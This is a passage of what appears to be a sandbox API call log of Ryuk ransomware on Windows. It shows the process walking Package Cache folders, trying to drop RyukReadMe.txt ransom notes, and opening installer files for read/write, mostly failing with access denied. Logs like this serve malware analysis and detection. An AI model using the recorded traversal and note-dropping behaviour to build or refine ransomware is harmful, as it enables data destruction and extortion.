VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.857] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.857] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0140.857] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0140.857] SetLastError (dwErrCode=0x0) [0140.857] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.857] GetLastError () returned 0x5 [0140.857] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.857] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.857] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.857] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.857] SetLastError (dwErrCode=0x0) [0140.857] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.857] GetLastError () returned 0x5 [0140.857] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.858] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.858] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.858] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.858] SetLastError (dwErrCode=0x0) [0140.858] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.858] GetLastError () returned 0x5 [0140.858] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.858] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.858] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.858] SetLastError (dwErrCode=0x0) [0140.858] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.858] GetLastError () returned 0x5 [0140.858] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.858] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.858] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.858] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.858] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.858] SetLastError (dwErrCode=0x0) [0140.858] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.859] GetLastError () returned 0x5 [0140.859] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.859] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.859] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.859] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.859] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.859] SetLastError (dwErrCode=0x0) [0140.859] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.860] GetLastError () returned 0x5 [0140.860] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.860] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.860] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0140.860] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.860] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.860] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.860] SetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", dwFileAttributes=0x80) returned 0 [0140.861] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.861] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.861] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.861] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.861] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.862] SetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi", dwFileAttributes=0x80) returned 0 [0140.863] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.863] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.863] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.863] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0140.863] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0140.863] SetLastError (dwErrCode=0x0) [0140.863] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.863] GetLastError () returned 0x5 [0140.863] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.863] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.863] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.863] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.864] SetLastError (dwErrCode=0x0) [0140.864] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.864] GetLastError () returned 0x5 [0140.864] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.864] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.864] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.864] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.864] SetLastError (dwErrCode=0x0) [0140.864] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.864] GetLastError () returned 0x5 [0140.864] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.864] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.864] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.864] SetLastError (dwErrCode=0x0) [0140.864] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.864] GetLastError () returned 0x5 [0140.864] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.864] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.864] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.865] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.865] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.865] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.865] SetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm", dwFileAttributes=0x80) returned 0 [0140.865] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.866] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.866] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.866] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.866] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.866] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.866] SetLastError (dwErrCode=0x0) [0140.866] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.866] GetLastError () returned 0x5 [0140.866] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.866] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.866] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.866] SetLastError (dwErrCode=0x0) [0140.866] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.866] GetLastError () returned 0x5 [0140.866] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.866] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.866] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.867] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.867] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.867] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.868] SetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm", dwFileAttributes=0x80) returned 0 [0140.868] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.868] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.868] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.868] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.868] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.868] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.868] SetLastError (dwErrCode=0x0) [0140.868] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.868] GetLastError () returned 0x5 [0140.868] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.868] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.868] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.868] SetLastError (dwErrCode=0x0) [0140.868] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.868] GetLastError () returned 0x5 [0140.868] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.869] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.869] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.869] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.869] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.869] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.869] SetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm", dwFileAttributes=0x80) returned 0 [0140.870] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.870] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.870] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.870] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.870] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.870] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.872] SetLastError (dwErrCode=0x0) [0140.872] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.872] GetLastError () returned 0x5 [0140.872] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.872] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.872] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.872] SetLastError (dwErrCode=0x0) [0140.872] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.872] GetLastError () returned 0x5 [0140.872] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.872] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.872] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.873] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.873] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.873] SetLastError (dwErrCode=0x0) [0140.873] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.873] GetLastError () returned 0x5 [0140.873] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.873] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.873] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.873] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.873] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.873] SetLastError (dwErrCode=0x0) [0140.873] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.873] GetLastError () returned 0x5 [0140.873] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.873] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.873] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0140.873] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.873] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.874] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.874] SetFileAttributesW 